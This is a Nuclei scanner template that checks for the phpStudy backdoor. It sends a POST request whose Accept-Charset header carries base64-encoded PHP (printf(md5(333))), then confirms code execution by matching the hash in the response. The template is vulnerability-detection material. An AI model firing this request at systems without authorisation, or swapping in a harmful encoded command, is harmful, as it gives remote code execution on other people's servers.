id: phpstudy-rce

info:
  name: phpstudy后门
  author: Str1am
  severity: critical
  reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Phpstudy/Phpstudy%20%E5%90%8E%E9%97%A8%EF%BC%88%E9%9D%9E%E5%AE%98%E6%96%B9%E5%90%8E%E9%97%A8%EF%BC%81%EF%BC%81%EF%BC%81%EF%BC%89/
  tags: phpstudy,rce

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Encoding:gzip,deflate
        Accept-Charset:cHJpbnRmKG1kNSgzMzMpKTs=
        Content-Length: 0
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "310dcbbf4cce62f762a2aaa148d556bd"
        part: body
        condition: and